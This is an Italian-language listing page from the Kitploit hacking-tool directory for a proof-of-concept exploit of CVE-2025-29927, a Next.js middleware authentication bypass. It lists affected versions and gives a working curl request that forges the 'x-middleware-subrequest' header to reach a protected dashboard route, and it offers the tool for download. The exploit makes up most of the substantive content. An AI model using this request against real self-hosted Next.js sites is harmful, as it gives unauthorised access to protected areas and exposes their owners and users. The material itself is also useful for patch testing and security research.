Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC-CVE-2025-29927- — Exploit proof-of-concept per CVE-2025-29927, che dimostra un bypass dell'autenticazione middleware in applicazioni Next.js self-hosted tramite header HTTP appositamente modificati. | Kitploit
Strumenti/GitHubGitHub/ethanol1310/poc-cve-2025-29927-
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubethanol1310/poc-cve-2025-29927-

POC-CVE-2025-29927-

Exploit proof-of-concept per CVE-2025-29927, che dimostra un bypass dell'autenticazione middleware in applicazioni Next.js self-hosted tramite header HTTP appositamente modificati.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Versioni interessate

  • Next.js 15.x < 15.2.3, 14.x < 14.2.25, Next.js 13.x < 13.5.9
  • Configurazioni self-hosted che utilizzano Middleware per funzionalità critiche, come l'autenticazione.

Guida

root@kitploit:~
npm run dev 
root@kitploit:~
curl --compressed -X GET http://localhost:3000/dashboard \
  -H "Host: localhost:3000" \
  -H "sec-ch-ua: \"Chromium\";v=\"135\", \"Not-A.Brand\";v=\"8\"" \
  -H "sec-ch-ua-mobile: ?0" \
  -H "sec-ch-ua-platform: \"macOS\"" \
  -H "Accept-Language: en-US,en;q=0.9" \
  -H "Upgrade-Insecure-Requests: 1" \
  -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" \
  -H "Sec-Fetch-Site: none" \
  -H "Sec-Fetch-Mode: navigate" \
  -H "Sec-Fetch-User: ?1" \
  -H "Sec-Fetch-Dest: document" \
  -H "Accept-Encoding: gzip, deflate, br" \
  -H "Connection: keep-alive" \
  -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware:src/middleware"

Grazie a ChatGPT

Scarica lo strumento